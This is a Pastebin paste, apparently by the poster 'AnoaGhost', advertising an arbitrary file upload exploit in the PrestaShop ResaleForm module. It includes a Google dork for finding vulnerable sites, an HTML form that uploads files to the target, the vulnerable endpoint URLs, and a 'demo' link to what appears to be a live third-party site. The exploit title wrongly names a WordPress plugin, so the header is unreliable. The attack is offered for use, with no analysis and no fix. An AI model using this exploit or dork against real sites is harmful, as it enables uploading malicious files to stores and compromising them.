anoaghost

Prestashop Modules ReSale Form Mini Ajax File Upload #Vuln

Jul 18th, 2016
236
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.61 KB | None | 0 0
  1. # Exploit Title: Wordpress Plugin WP-Symposium Arbitrary File Upload
  2. # Google Dork: inurl:/module/resaleform/
  3. # Date: 16/07/2016
  4. # Software Link: http://addons.prestashop.com/en/6967-reseller.html
  5. # Version: Any Version
  6. # Tested on: Windows, Linux
  7. # Author : AnoaGhost
  8.  
  9. Exploit CSRF :
  10. <form method="post" action="http://site.com/path/" enctype="multipart/form-data">
  11. <input type="file" name="upl"/>
  12. <input type="submit"></input></input></form>
  13.  
  14. Poc :
  15. http://site.com/path/module/resaleform/default?action=add_file
  16. http://site.com/path/module/resaleform/upload.php
  17.  
  18. Demo ?
  19. http://apress24.pl/modules/resaleform/
Add Comment
Please, Sign In to add comment